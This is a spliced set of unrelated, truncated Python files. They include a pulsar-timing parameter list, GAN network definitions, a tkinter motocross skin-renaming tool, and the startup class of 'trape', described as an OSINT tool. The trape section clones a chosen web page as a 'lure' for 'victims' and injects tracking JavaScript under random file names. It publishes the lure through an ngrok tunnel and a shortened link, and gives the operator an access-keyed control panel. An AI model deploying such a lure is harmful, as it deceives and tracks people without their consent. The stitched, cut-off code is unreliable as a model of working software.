parameters.append('EQUAD_'+p.name+'_'+systems.keys()[jj])
if 'nano-f' in p.sysflagdict.keys() and len(p.sysflagdict['nano-f'].keys())>0:
for jj,nano_sysname in enumerate(p.sysflagdict['nano-f'].keys()):
parameters.append('ECORR_'+p.name+'_'+nano_sysname)
if args.incBand:
if args.bandSpecModel == 'powerlaw':
parameters += ['Aband_'+str(ii) for ii in range(len(bands)-1)]
parameters += ['gam_band_'+str(ii) for ii in range(len(bands)-1)]
elif args.bandSpecModel == 'spectrum':
for ii in range(len(bands)-1):
for jj in range(nmodes_band):
parameters.append('bandSpec_band'+str(ii)+'_mode'+str(jj))
if args.incClk:
if args.clkSpecModel == 'powerlaw':
parameters += ['Aclk', 'gam_clk']
elif args.clkSpecModel == 'spectrum':
for jj in range(nmodes_red):
parameters.append('clkSpec'+'_{0}'.format(jj+1))
if args.incCm:
if args.cmSpecModel == 'powerlaw':
parameters += ['Acm', 'gam_cm']
elif args.cmSpecModel == 'spectrum':
for jj in range(nmodes_red):
parameters.append('cmSpec'+'_{0}'.format(jj+1))
if args.incEph and not args.jplBasis:
if args.ephSpecModel == 'powerlaw':
parameters += ['Aephx', 'Aephy', 'Aephz']
parameters += ['gam_ephx', 'gam_ephy', 'gam_ephz']
elif args.ephSpecModel == 'spectrum':
for jj in range(nmodes_eph):
parameters.append('ephxSpec'+'_{0}'.format(jj+1))
for jj in range(nmodes_eph):
parameters.append('ephySpec'+'_{0}'.format(jj+1))
for jj in range(nmodes_eph):
parameters.append('ephzSpec'+'_{0}'.format(jj+1))
if args.incDip:
if args.dipSpecModel == 'powerlaw':
parameters += ['Adip', 'gam_dip']
elif args.dipSpecModel == 'spectrum':
for jj in range(nmodes_red):
parameters.append('dipSpec'+'_{0}'.format(jj+1))
if args.incGWB:
if args.gwbSpecModel == 'powerlaw':
parameters.append("Agwb")
if args.fix_slope is None:
parameters.append("gam_gwb")
elif args.gwbSpecModel == 'spectrum':
for ii in range(nmodes_red):
parameters.append('gwbSpec_{0}'.format(ii+1))
if args.gwbPrior == 'gaussProc':
if gwb_popparam == 'starsecc':
parameters += ["Agwb","stars","ecc"]
elif gwb_popparam == 'alphastarsecc':
parameters += ["Agwb","alpha","stars","ecc"]
elif gwb_popparam == 'cosmicstring':
parameters += ["Agwb","Gmu","p"]
else:
parameters += ["Agwb",gwb_popparam]
elif args.gwbSpecModel == 'turnover':
parameters += ["Agwb"]
if args.gwb_fb2env is not None:
parameters += [args.gwb_fb2env]
elif args.gwb_fb2env is None:
parameters += ["kappa", "fbend"]
elif args.gwbSpecModel == 'gpEnvInterp':
parameters += ["Agwb", "ecc"]
if args.incCorr:
if args.gwbTypeCorr == 'modelIndep':
for ii in range(tmp_nwins):
for jj in range(int(len(psr)*(len(psr)-1)/2)):
parameters.append('phi_corr_win{0}_val{1}'.format(ii+1,jj+1))
elif args.gwbTypeCorr == 'pointSrc':
if args.fixPointSrcPhi is None and args.fixPointSrcTheta is None:
for ii in range(tmp_nwins):
parameters += ["gwb_phi_win{0}".format(ii+1),
"gwb_costheta_win{0}".format(ii+1)]
elif args.gwbTypeCorr == 'spharmAnis':
for ii in range(tmp_nwins):
for jj in range((args.LMAX+1)**2 - 1):
parameters.append('clm_win{0}_val{1}'.format(ii+1,jj+1))
elif args.gwbTypeCorr == 'dipoleOrf':
for ii in range(tmp_nwins):
parameters += ["gwdip_phi_win{0}".format(ii+1),
"gwdip_costheta_win{0}".format(ii+1),
"gwdip_wgt_win{0}".format(ii+1)]
elif args.gwbTypeCorr == 'gwDisk':
for ii in range(tmp_nwins):
parameters += ["gwdisk_phi_win{0}".format(ii+1),
"gwdisk_costheta_win{0}".format(ii+1),
"gwdisk_radius_win{0}".format(ii+1),
"gwdisk_wgt_win{0}".format(ii+1)]
elif args.gwbTypeCorr == 'psrlocsVary':
for ii in range(tmp_nwins):
for jj in range(len(psr)):
parameters.append("gwphi_win{0}_psr{1}".format(ii+1,jj+1))
for ii in range(tmp_nwins):
for jj in range(len(psr)):
parameters.append("gwctheta_win{0}_psr{1}".format(ii+1,jj+1))
if args.gwbModelSelect:
parameters.append("gwb_modindex")
if args.incGWline:
parameters += ["spec_gwline", "freq_gwline",
"phi_gwline", "costheta_gwline"]
if args.det_signal:
if args.cgw_search:
parameters += ["chirpmass", "qratio", "dist", "h_strain", "orb-freq",
"phi", "costheta", "cosiota", "gwpol", "gwgamma", "l0"]
if args.ecc_search:
parameters.append("ecc")
if args.psrTerm:
[parameters.append('pdist_'+p.name) for p in psr]
[parameters.append('gp0_'+p.name) for p in psr]
[parameters.append('lp0_'+p.name) for p in psr]
if args.cgwModelSelect:
parameters.append("nmodel_cgw")
if args.bwm_search:
parameters += ["burst_mjd", "burst_strain",
"phi", "costheta", "gwpol"]
if args.bwm_model_select:
parameters.append("nmodel_bwm")
if args.eph_quadratic:
parameters += ["eph_xquad0amp", "eph_xquad1amp", "eph_xquad2amp",
"eph_yquad0amp", "eph_yquad1amp", "eph_yquad2amp",
"eph_zquad0amp", "eph_zquad1amp", "eph_zquad2amp"]
#parameters += ["eph_xquad1amp", "eph_xquad2amp", "eph_yquad1amp",
# "eph_yquad2amp", "eph_zquad1amp", "eph_zquad2amp",
# "eph_xquad1sign", "eph_xquad2sign", "eph_yquad1sign",
# "eph_yquad2sign", "eph_zquad1sign", "eph_zquad2sign"]
if args.eph_planetdelta:
if args.eph_planetmass:
if args.eph_planetmassprior == 'official':
parameters += ["planet{0}_delta_mass".format(ii) for ii in | |
<reponame>yuweiliandrew/openrtist
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import init
import functools
from torch.optim import lr_scheduler
import numpy as np
from .stylegan_networks import StyleGAN2Discriminator, StyleGAN2Generator, TileStyleGAN2Discriminator
###############################################################################
# Helper Functions
###############################################################################
def get_filter(filt_size=3):
if(filt_size == 1):
a = np.array([1., ])
elif(filt_size == 2):
a = np.array([1., 1.])
elif(filt_size == 3):
a = np.array([1., 2., 1.])
elif(filt_size == 4):
a = np.array([1., 3., 3., 1.])
elif(filt_size == 5):
a = np.array([1., 4., 6., 4., 1.])
elif(filt_size == 6):
a = np.array([1., 5., 10., 10., 5., 1.])
elif(filt_size == 7):
a = np.array([1., 6., 15., 20., 15., 6., 1.])
filt = torch.Tensor(a[:, None] * a[None, :])
filt = filt / torch.sum(filt)
return filt
class Downsample(nn.Module):
def __init__(self, channels, pad_type='reflect', filt_size=3, stride=2, pad_off=0):
super(Downsample, self).__init__()
self.filt_size = filt_size
self.pad_off = pad_off
self.pad_sizes = [int(1. * (filt_size - 1) / 2), int(np.ceil(1. * (filt_size - 1) / 2)), int(1. * (filt_size - 1) / 2), int(np.ceil(1. * (filt_size - 1) / 2))]
self.pad_sizes = [pad_size + pad_off for pad_size in self.pad_sizes]
self.stride = stride
self.off = int((self.stride - 1) / 2.)
self.channels = channels
filt = get_filter(filt_size=self.filt_size)
self.register_buffer('filt', filt[None, None, :, :].repeat((self.channels, 1, 1, 1)))
self.pad = get_pad_layer(pad_type)(self.pad_sizes)
def forward(self, inp):
if(self.filt_size == 1):
if(self.pad_off == 0):
return inp[:, :, ::self.stride, ::self.stride]
else:
return self.pad(inp)[:, :, ::self.stride, ::self.stride]
else:
return F.conv2d(self.pad(inp), self.filt, stride=self.stride, groups=inp.shape[1])
class Upsample2(nn.Module):
def __init__(self, scale_factor, mode='nearest'):
super().__init__()
self.factor = scale_factor
self.mode = mode
def forward(self, x):
return torch.nn.functional.interpolate(x, scale_factor=self.factor, mode=self.mode)
class Upsample(nn.Module):
def __init__(self, channels, pad_type='repl', filt_size=4, stride=2):
super(Upsample, self).__init__()
self.filt_size = filt_size
self.filt_odd = np.mod(filt_size, 2) == 1
self.pad_size = int((filt_size - 1) / 2)
self.stride = stride
self.off = int((self.stride - 1) / 2.)
self.channels = channels
filt = get_filter(filt_size=self.filt_size) * (stride**2)
self.register_buffer('filt', filt[None, None, :, :].repeat((self.channels, 1, 1, 1)))
self.pad = get_pad_layer(pad_type)([1, 1, 1, 1])
def forward(self, inp):
ret_val = F.conv_transpose2d(self.pad(inp), self.filt, stride=self.stride, padding=1 + self.pad_size, groups=inp.shape[1])[:, :, 1:, 1:]
if(self.filt_odd):
return ret_val
else:
return ret_val[:, :, :-1, :-1]
def get_pad_layer(pad_type):
if(pad_type in ['refl', 'reflect']):
PadLayer = nn.ReflectionPad2d
elif(pad_type in ['repl', 'replicate']):
PadLayer = nn.ReplicationPad2d
elif(pad_type == 'zero'):
PadLayer = nn.ZeroPad2d
else:
print('Pad type [%s] not recognized' % pad_type)
return PadLayer
class Identity(nn.Module):
def forward(self, x):
return x
def get_norm_layer(norm_type='instance'):
"""Return a normalization layer
Parameters:
norm_type (str) -- the name of the normalization layer: batch | instance | none
For BatchNorm, we use learnable affine parameters and track running statistics (mean/stddev).
For InstanceNorm, we do not use learnable affine parameters. We do not track running statistics.
"""
if norm_type == 'batch':
norm_layer = functools.partial(nn.BatchNorm2d, affine=True, track_running_stats=True)
elif norm_type == 'instance':
norm_layer = functools.partial(nn.InstanceNorm2d, affine=False, track_running_stats=False)
elif norm_type == 'none':
def norm_layer(x):
return Identity()
else:
raise NotImplementedError('normalization layer [%s] is not found' % norm_type)
return norm_layer
def get_scheduler(optimizer, opt):
"""Return a learning rate scheduler
Parameters:
optimizer -- the optimizer of the network
opt (option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions.
opt.lr_policy is the name of learning rate policy: linear | step | plateau | cosine
For 'linear', we keep the same learning rate for the first <opt.n_epochs> epochs
and linearly decay the rate to zero over the next <opt.n_epochs_decay> epochs.
For other schedulers (step, plateau, and cosine), we use the default PyTorch schedulers.
See https://pytorch.org/docs/stable/optim.html for more details.
"""
if opt.lr_policy == 'linear':
def lambda_rule(epoch):
lr_l = 1.0 - max(0, epoch + opt.epoch_count - opt.n_epochs) / float(opt.n_epochs_decay + 1)
return lr_l
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda_rule)
elif opt.lr_policy == 'step':
scheduler = lr_scheduler.StepLR(optimizer, step_size=opt.lr_decay_iters, gamma=0.1)
elif opt.lr_policy == 'plateau':
scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.2, threshold=0.01, patience=5)
elif opt.lr_policy == 'cosine':
scheduler = lr_scheduler.CosineAnnealingLR(optimizer, T_max=opt.n_epochs, eta_min=0)
else:
return NotImplementedError('learning rate policy [%s] is not implemented', opt.lr_policy)
return scheduler
def init_weights(net, init_type='normal', init_gain=0.02, debug=False):
"""Initialize network weights.
Parameters:
net (network) -- network to be initialized
init_type (str) -- the name of an initialization method: normal | xavier | kaiming | orthogonal
init_gain (float) -- scaling factor for normal, xavier and orthogonal.
We use 'normal' in the original pix2pix and CycleGAN paper. But xavier and kaiming might
work better for some applications. Feel free to try yourself.
"""
def init_func(m): # define the initialization function
classname = m.__class__.__name__
if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):
if debug:
print(classname)
if init_type == 'normal':
init.normal_(m.weight.data, 0.0, init_gain)
elif init_type == 'xavier':
init.xavier_normal_(m.weight.data, gain=init_gain)
elif init_type == 'kaiming':
init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')
elif init_type == 'orthogonal':
init.orthogonal_(m.weight.data, gain=init_gain)
else:
raise NotImplementedError('initialization method [%s] is not implemented' % init_type)
if hasattr(m, 'bias') and m.bias is not None:
init.constant_(m.bias.data, 0.0)
elif classname.find('BatchNorm2d') != -1: # BatchNorm Layer's weight is not a matrix; only normal distribution applies.
init.normal_(m.weight.data, 1.0, init_gain)
init.constant_(m.bias.data, 0.0)
net.apply(init_func) # apply the initialization function <init_func>
def init_net(net, init_type='normal', init_gain=0.02, gpu_ids=[], debug=False, initialize_weights=True):
"""Initialize a network: 1. register CPU/GPU device (with multi-GPU support); 2. initialize the network weights
Parameters:
net (network) -- the network to be initialized
init_type (str) -- the name of an initialization method: normal | xavier | kaiming | orthogonal
gain (float) -- scaling factor for normal, xavier and orthogonal.
gpu_ids (int list) -- which GPUs the network runs on: e.g., 0,1,2
Return an initialized network.
"""
if len(gpu_ids) > 0:
assert(torch.cuda.is_available())
net.to(gpu_ids[0])
# if not amp:
# net = torch.nn.DataParallel(net, gpu_ids) # multi-GPUs for non-AMP training
if initialize_weights:
init_weights(net, init_type, init_gain=init_gain, debug=debug)
return net
def define_G(input_nc, output_nc, ngf, netG, norm='batch', use_dropout=False, init_type='normal',
init_gain=0.02, no_antialias=False, no_antialias_up=False, gpu_ids=[], opt=None):
"""Create a generator
Parameters:
input_nc (int) -- the number of channels in input images
output_nc (int) -- the number of channels in output images
ngf (int) -- the number of filters in the last conv layer
netG (str) -- the architecture's name: resnet_9blocks | resnet_6blocks | unet_256 | unet_128
norm (str) -- the name of normalization layers used in the network: batch | instance | none
use_dropout (bool) -- if use dropout layers.
init_type (str) -- the name of our initialization method.
init_gain (float) -- scaling factor for normal, xavier and orthogonal.
gpu_ids (int list) -- which GPUs the network runs on: e.g., 0,1,2
Returns a generator
Our current implementation provides two types of generators:
U-Net: [unet_128] (for 128x128 input images) and [unet_256] (for 256x256 input images)
The original U-Net paper: https://arxiv.org/abs/1505.04597
Resnet-based generator: [resnet_6blocks] (with 6 Resnet blocks) and [resnet_9blocks] (with 9 Resnet blocks)
Resnet-based generator consists of several Resnet blocks between a few downsampling/upsampling operations.
We adapt Torch code from <NAME>'s neural style transfer project (https://github.com/jcjohnson/fast-neural-style).
The generator has been initialized by <init_net>. It uses RELU for non-linearity.
"""
net = None
norm_layer = get_norm_layer(norm_type=norm)
if netG == 'resnet_9blocks':
net = ResnetGenerator(input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, no_antialias=no_antialias, no_antialias_up=no_antialias_up, n_blocks=9, opt=opt)
elif netG == 'resnet_6blocks':
net = ResnetGenerator(input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, no_antialias=no_antialias, no_antialias_up=no_antialias_up, n_blocks=6, opt=opt)
elif netG == 'resnet_4blocks':
net = ResnetGenerator(input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, no_antialias=no_antialias, no_antialias_up=no_antialias_up, n_blocks=4, opt=opt)
elif netG == 'unet_128':
net = UnetGenerator(input_nc, output_nc, 7, ngf, norm_layer=norm_layer, use_dropout=use_dropout)
elif netG == 'unet_256':
net = UnetGenerator(input_nc, output_nc, 8, ngf, norm_layer=norm_layer, use_dropout=use_dropout)
elif netG == 'stylegan2':
net = StyleGAN2Generator(input_nc, output_nc, ngf, use_dropout=use_dropout, opt=opt)
elif netG == 'smallstylegan2':
net = StyleGAN2Generator(input_nc, output_nc, ngf, use_dropout=use_dropout, n_blocks=2, opt=opt)
elif netG == 'resnet_cat':
n_blocks = 8
net = G_Resnet(input_nc, output_nc, opt.nz, num_downs=2, n_res=n_blocks - 4, ngf=ngf, norm='inst', nl_layer='relu')
else:
raise NotImplementedError('Generator model name [%s] is not recognized' % netG)
return init_net(net, init_type, init_gain, gpu_ids, initialize_weights=('stylegan2' not in netG))
def define_F(input_nc, netF, norm='batch', use_dropout=False, init_type='normal', init_gain=0.02, no_antialias=False, gpu_ids=[], opt=None):
if netF == 'global_pool':
net = PoolingF()
elif netF == 'reshape':
net = ReshapeF()
elif netF == 'sample':
net = PatchSampleF(use_mlp=False, init_type=init_type, init_gain=init_gain, gpu_ids=gpu_ids, nc=opt.netF_nc)
elif netF == 'mlp_sample':
net = PatchSampleF(use_mlp=True, init_type=init_type, init_gain=init_gain, gpu_ids=gpu_ids, nc=opt.netF_nc)
elif netF == 'strided_conv':
net = StridedConvF(init_type=init_type, init_gain=init_gain, gpu_ids=gpu_ids)
else:
raise NotImplementedError('projection model name [%s] is not recognized' % netF)
return init_net(net, init_type, init_gain, gpu_ids)
def define_D(input_nc, ndf, netD, n_layers_D=3, norm='batch', init_type='normal', init_gain=0.02, no_antialias=False, gpu_ids=[], opt=None):
"""Create a discriminator
Parameters:
input_nc (int) -- the number of channels in | |
<gh_stars>1000+
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#**
#
#########
# trape #
#########
#
# trape depends of this file
# For full copyright information this visit: https://github.com/jofpin/trape
#
# Copyright 2018 by <NAME> (@jofpin) / <<EMAIL>>
#**
import time
import json
import urllib
from core.dependence import urllib2
import http.client
import argparse
import socket
import sys
import os
from core.utils import utils
import subprocess
import requests
import hashlib, binascii
from threading import Timer
from multiprocessing import Process
import atexit
class Trape(object):
def __init__(self, stat = 0):
self.name_trape = "Trape"
self.version = "2.1"
self.stats_path = "ngrok"
self.home_path = utils.generateToken(18)
self.logout_path = utils.generateToken(6)
self.remove_path = utils.generateToken(14)
self.injectURL = utils.generateToken(12) + '.js'
self.stats_key = utils.generateToken(24)
self.date_start = time.strftime("%Y-%m-%d - %H:%M:%S")
self.stat = stat
self.localIp = '127.0.0.1'
self.nGrokUrl = ''
self.JSFiles = ({"path" : "base.js", "src" : utils.generateToken(12)},{"path" : "libs.min.js", "src" : utils.generateToken(12)},{"path" : "login.js", "src" : utils.generateToken(12)},{"path" : "payload.js", "src" : utils.generateToken(12)},{"path" : "trape.js", "src" : utils.generateToken(12)},{"path" : "vscript.js", "src" : utils.generateToken(12)},{"path" : "custom.js", "src" : utils.generateToken(12)},)
self.CSSFiles = ({"path" : "/static/img/favicon.ico", "src" : utils.generateToken(12)},{"path" : "/static/img/favicon.png", "src" : utils.generateToken(12)},{"path" : "/static/css/base-icons.css", "src" : utils.generateToken(12)},{"path" : "/static/css/styles.css", "src" : utils.generateToken(12)},{"path" : "/static/css/normalize.min.css", "src" : utils.generateToken(12)},{"path": "/static/css/services-icons.css", "src" : utils.generateToken(12)},)
if self.stat == 1:
c = http.client.HTTPConnection('www.google.com', timeout=5)
try:
c.request("HEAD", "/")
c.close()
except Exception as e:
c.close()
utils.Go("\033[H\033[J")
utils.Go(utils.Color['whiteBold'] + "[" + utils.Color['redBold'] + "x" + utils.Color['whiteBold'] + "]" + utils.Color['redBold'] + " " + "NOTICE: " + utils.Color['white'] + "Trape needs Internet connection for working" + "\n\t")
sys.exit(0)
if (not(os.path.exists("trape.config"))):
self.trape_config()
try:
config_trape = json.load(open("trape.config"))
except Exception as error:
os.remove('trape.config')
self.trape_config()
self.ngrok = config_trape['ngrok_token']
self.gmaps = config_trape['gmaps_api_key']
self.ipinfo = config_trape['ipinfo_api_key']
if self.gmaps == '':
self.gmaps = '<KEY>'
self.googl = config_trape['gshortener_api_key']
if self.googl == '':
self.googl = '<KEY>'
parser = argparse.ArgumentParser("python3 trape.py -u <<Url>> -p <<Port>>")
parser.add_argument('-u', '--url', dest='url', help='Put the web page url to clone')
parser.add_argument('-p', '--port', dest='port', help='Insert your port')
parser.add_argument('-ak', '--accesskey', dest='accesskey', help='Insert your custom key access')
parser.add_argument('-l', '--local', dest='local', help='Insert your home file')
parser.add_argument('-n', '--ngrok', dest='ngrok', help='Insert your ngrok Authtoken', action='store_true')
parser.add_argument('-ic', '--injectcode', dest='injc', help='Insert your custom REST API path')
parser.add_argument('-ud', '--update', dest='update', action='store_true', default=False, help='Update trape to the latest version')
options = parser.parse_args()
self.type_lure = 'global'
# Check current updates
if options.update:
utils.Go("\033[H\033[J")
utils.Go("Updating..." + " " + utils.Color['blue'] + "trape" + utils.Color['white'] + "..." + "\n")
subprocess.check_output(["git", "reset", "--hard", "origin/master"])
subprocess.check_output(["git", "pull"])
utils.Go("Trape Updated... Please execute again...")
sys.exit(0)
if options.url is None:
utils.Go("\033[H\033[J")
utils.Go("----------------------------------------------")
utils.Go("" + " " + utils.Color['redBold'] + "TRAPE" + utils.Color['white'] +" {" + utils.Color['yellowBold'] + "stable" + utils.Color['white'] + "}" + utils.Color['white'] + " - " + "Osint and analytics tool" + " " + "<" +utils.Color['white'])
utils.Go("----------------------------------------------")
utils.Go("| v" + utils.Color['redBold'] + self.version + utils.Color['white'] + " |")
utils.Go("--------" + "\n")
utils.Go(utils.Color['whiteBold'] + "[" + utils.Color['greenBold'] + "!" + utils.Color['whiteBold'] + "]" + " " + utils.Color['white'] + "Enter the information requested below to complete the execution" + utils.Color['white'])
utils.Go("")
options.url = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " Enter a URL to generate the lure" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
if options.port is None:
options.port = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " What is your port to generate the server?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
while utils.checkPort(int(options.port)) == False:
utils.Go("\033[H\033[J")
utils.Go("----------------------------------------------")
utils.Go("" + " " + utils.Color['redBold'] + "TRAPE" + utils.Color['white'] +" {" + utils.Color['yellowBold'] + "stable" + utils.Color['white'] + "}" + utils.Color['white'] + " - " + "Osint and analytics tool" + " " + "<" +utils.Color['white'])
utils.Go("----------------------------------------------")
utils.Go("\n")
utils.Go(utils.Color['whiteBold'] + "[" + utils.Color['redBold'] + "x" + utils.Color['whiteBold'] + "]" + utils.Color['redBold'] + " " + "ERROR:" + " " + utils.Color['whiteBold'] + "The port: " + options.port + utils.Color['white'] + " " + "is not available, It was previously used (" + utils.Color['yellow'] + "Use another port" + utils.Text['end'] + ")" + "\n\n")
options.port = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " What is your port to generate the server?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
#while utils.checkUrl(str(options.url)) == False:
options.url = input(utils.Color['blueBold'] + "-" + utils.Color['white'] + " Enter a URL to generate the lure" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
utils.Go("")
utils.Go(utils.Color['greenBold'] + "-" + utils.Color['white'] + " Successful " + utils.Color['greenBold'] + "startup" + utils.Color['white'] + ", get lucky on the way!" + utils.Color['white'])
utils.Go("")
time.sleep(0.1)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
self.localIp = s.getsockname()[0]
self.app_port = int(options.port)
self.url_to_clone = str(options.url)
if self.url_to_clone[0:4] != 'http':
self.url_to_clone = 'http://' + self.url_to_clone
self.victim_path = options.url.replace("http://", "").replace("https://", "")
if (options.ngrok or (self.ngrok != "")):
if self.ngrok == '':
utils.Go("\033[H\033[J")
self.ngrok = input("What is your nGrok token?" + " " + utils.Color['yellow'] + ":~> " + utils.Color['white'])
if (self.ngrok != ''):
from core.ngrok import ngrok
import os.path as path
v_ngrok = ngrok(self.ngrok, self.app_port, stat, self.stats_path)
else:
utils.Go(utils.Color['whiteBold'] + "[" + utils.Color['redBold'] + "x" + utils.Color['whiteBold'] + "]" + utils.Color['redBold'] + " " + "ERROR: " + " " + utils.Color['white'] + "Your nGrok authtoken can't be empty")
# Custom name of REST API
if (options.injc):
self.injectURL = options.injc
# Custom access token
if (options.accesskey):
self.stats_key = options.accesskey
# Design principal of the header of trape
def header(self):
if self.stat == 1:
# Principal header of tool
utils.banner()
# Update verification
changeLog = requests.get("https://raw.githubusercontent.com/jofpin/trape/master/version.txt", timeout = 4)
changeLog = changeLog.text.split(" ")[1]
changeLog = changeLog.strip()
if changeLog != self.version:
utils.Go(utils.Color['white'] + "\t" + utils.Color['yellowBold'] + "@" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['whiteBold'] + " " + "UPDATES:" + " " + utils.Color['yellowBold'] + "NEW VERSION IS AVAILABLE: " + utils.Color['white'] + "v" + utils.Color['redBold'] + changeLog + utils.Color['white'] + " " + "(install changes)")
utils.Go("")
else:
utils.Go(utils.Color['white'] + "\t" + utils.Color['yellowBold'] + "@" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['whiteBold'] + " " + "UPDATES:" + " " + utils.Color['greenBold'] + "RUNNING RECENT VERSION" + utils.Color['white'])
utils.Go("")
# Local information vars
utils.Go(utils.Color['white'] + "\t" + utils.Color['whiteBold'] + "LOCAL INFORMATION" + utils.Text['end'])
utils.Go("\t" + "-------------------")
utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " Lure for the users: " + utils.Color['blue'] + 'http://' + self.localIp + ':' + str(self.app_port) + '/' + self.victim_path)
utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " Your REST API path: " + utils.Color['blue'] + 'http://' + self.localIp + ':' + str(self.app_port) + '/' + self.injectURL + utils.Color['white'])
utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " Control Panel Link: " + utils.Color['blue'] + "http://127.0.0.1:" + utils.Color['blue'] + str(self.app_port) + '/' + self.stats_path)
utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " Your Access key: " + utils.Color['blue'] + self.stats_key + utils.Color['white'])
utils.Go("")
if self.ngrok != '':
if self.googl == '':
self.googl = 'AI<KEY>'
try:
opener = urllib.request.build_opener()
pLog = 4040
ngrokStatus = str(opener.open('http://127.0.0.1:' + str(pLog) + '/api/tunnels').read()).replace('\n', '').replace(' ', '')
time.sleep(0.5)
ngrokUrlPos = ngrokStatus.find('ngrok.io')
if ngrokUrlPos <= 0:
time.sleep(4)
ngrokStatus = str(opener.open('http://127.0.0.1:' + str(pLog) + '/api/tunnels').read()).replace('\n', '').replace(' ', '')
ngrokUrlPos = ngrokStatus.find('ngrok.io')
if ngrokUrlPos >= 0:
ngrokStatus = ngrokStatus[ngrokUrlPos-25:ngrokUrlPos+28]
ngrokUrlPos = ngrokStatus.find('http')
ngrokUrlPos2 = ngrokStatus.find('.io')
ngrokStatus = ngrokStatus[ngrokUrlPos: ngrokUrlPos2] + '.io'
utils.Go(utils.Color['white'] + "\t" + utils.Color['whiteBold'] + "PUBLIC INFORMATION" + utils.Text['end'])
utils.Go("\t" + "-------------------")
r = utils.gShortener(self.googl, ngrokStatus.replace('https', 'http') + '/' + self.victim_path)
self.nGrokUrl = ngrokStatus.replace('https', 'http')
utils.Go(utils.Color['white'] + "\t" + utils.Color['yellow'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " Public lure: " + utils.Color['blue'] + self.nGrokUrl + '/' + self.victim_path + utils.Color['white'])
utils.Go(utils.Color['white'] + "\t" + utils.Color['yellow'] + ">" + utils.Color['white'] + "-" + utils.Color['blue'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " Control Panel link: " + utils.Color['blue'] + ngrokStatus.replace('https', 'http') + '/' + self.stats_path + utils.Color['white'])
else:
utils.Go(utils.Color['red'] + "\t" + utils.Color['green'] + "-" + utils.Color['white'] + "--" + utils.Color['red'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " We can't connect with nGrok " + utils.Color['white'])
except Exception as e:
utils.Go(utils.Color['white'] + "[" + utils.Color['redBold'] + "x" + utils.Color['whiteBold'] + "]" + utils.Color['redBold'] + " " + "ERROR: " + " " + utils.Color['white'] + e.message)
utils.Go(utils.Color['red'] + "\t" + utils.Color['green'] + "-" + utils.Color['white'] + "--" + utils.Color['red'] + "=" + utils.Color['white'] + "[" + utils.Color['white'] + " We can't connect with nGrok " + utils.Color['white'])
utils.Go("\n" + utils.Color['white'])
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + ">" + utils.Color['white'] + "]" + utils.Color['whiteBold'] + " " + "Start time:" + " " + utils.Color['white'] + self.date_start)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "?" + utils.Color['white'] + "]" + utils.Color['white'] + " " + "Do not forget to close | |
from tkinter import *
from tkinter import filedialog, messagebox
import os, shutil, subprocess
from os import listdir
from os import path
from os.path import isfile, join, splitext
import platform
root = Tk()
root.minsize(640, 640)
root.resizable(0, 0)
root.title("MXSkinNamer")
root.directory = None
dynosList = {"Honda (450f)": "crf450v2017", "Husqvarna (450f)": "fc450v2016",
"Kawasaki (450f)": "kx450fv2016", "KTM (450f)": "450sxfv2016", "Suzuki (450f)": "rmz450v2018",
"Yamaha (450f)": "yz450fv2014", "KTM (350f)": "350sxfv2016", "Honda (250f)": "crf250v2018",
"Husqvarna (250f)": "fc250v2016", "Kawasaki (250f)": "kx250fv2017", "KTM (250f)": "250sxfv2016",
"Suzuki (250f)": "rmz250v2010", "Yamaha (250f)": "yz250fv2014", "Honda (250t)": "cr250",
"Kawasaki (250t)": "kx250", "KTM (250t)": "250sx", "Suzuki (250t)": "rm250", "Yamaha (250t)": "yz250",
"Honda (125)": "cr125", "Kawasaki (125)": "kx125", "KTM (125)": "125sx", "Yamaha (125)": "yz125",
"Suzuki (125)": "rm125", "Rider Body": "rider_body", "Helmet": "rider_head", "Wheels": "wheels"}
jmParts = {"fork_lower", "fork_upper", "frame", "swingarm",
"side_plates", "front_plate", "rider_body", "rider_head", "wheels"}
def open_directory_browser():
root.directory = filedialog.askdirectory()
if not root.directory == "":
# Get files from directory
files = get_files_in_directory(root.directory)
if len(files[0]) > 0 or len(files[1]) > 0:
mapFiles = files[0]
jmFiles = files[1]
# Populate skins listbox
populate_listbox(skinsListbox, mapFiles)
# Populate jms listbox
populate_listbox(jmListbox, jmFiles)
# Show the user the working dir
currentWorkingDirectoryLabel["text"] = f"{root.directory}"
def get_files_in_directory(directory):
mapFiles = []
jmFiles = []
for f in listdir(directory):
filepath = join(directory + "/" + f)
if isfile(filepath):
